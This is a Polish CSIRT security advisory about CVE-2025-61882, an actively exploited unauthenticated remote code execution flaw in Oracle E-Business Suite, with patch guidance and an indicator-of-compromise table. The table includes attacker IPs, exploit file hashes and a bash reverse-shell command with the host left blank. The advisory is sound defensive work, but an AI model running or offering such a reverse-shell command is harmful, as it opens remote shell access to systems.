Krytyczna podatność w środowisku Oracle E-Business Suite
CSIRT CeZ ostrzega: wykryto krytyczną podatność w środowisku Oracle E-Business Suite (komponent: BI Publisher Integration), która jest aktywnie wykorzystywana w atakach typu 0-day. Luka może prowadzić do zdalnego wykonania kodu przez nieuwierzytelnionego atakującego. Administratorzy powinni niezwłocznie wdrożyć poprawki udostępnione przez producenta.
Charakterystyka podatności
- Oznaczenie: CVE-2025-61882
- Score: 9.8 Critical
Podatność umożliwia atakującemu na zdalne wykonanie kodu na serwerze bazy danych poprzez przetworzenie specjalnie spreparowanych żądań wysłanych do bazy. Wykorzystanie podatność nie wymaga uwierzytelniania ani żadnej interakcji ze strony użytkownika natomiast może mieć wpływ na dostępność oraz poufność danych. .
Podatne systemy
Oracle E-Business Suite w wersjach:
- od 12.2.3 do 12.2.14 (włącznie)
Działania zapobiegawcze
Zalecamy aktualizację do wersji zawierającej poprawkę udostępnioną przez Oracle w ramach Security Alert z 4 października 2025.
Wskaźniki zagrożenia (IOC)
Poniżej znajdują się wskaźniki zagrożenia, dzięki którym można zapobiec potencjalnym atakom.
| Wskaźnik | Typ | Opis |
| 200[.]107[.]207[.]26 | IP | Potential GET and POST activity |
| 185[.]181[.]60[.]11 | IP | Potential GET and POST activity |
| sh -c /bin/bash -i >& /dev/tcp// 0>&1 | Command | Establish an outbound TCP connection over a specific port |
| 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f 72b104ca0f31235d | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_ cl0p_hunters.zip |
| aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4b f6960d6c73d41121 | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard- cl0p_hunters/exp.py |
| 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0 143bff34b882c1b | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard- cl0p_hunters/server.py |
Źródła
Oracle – Security Alert
CVE-2025-61882 – NVD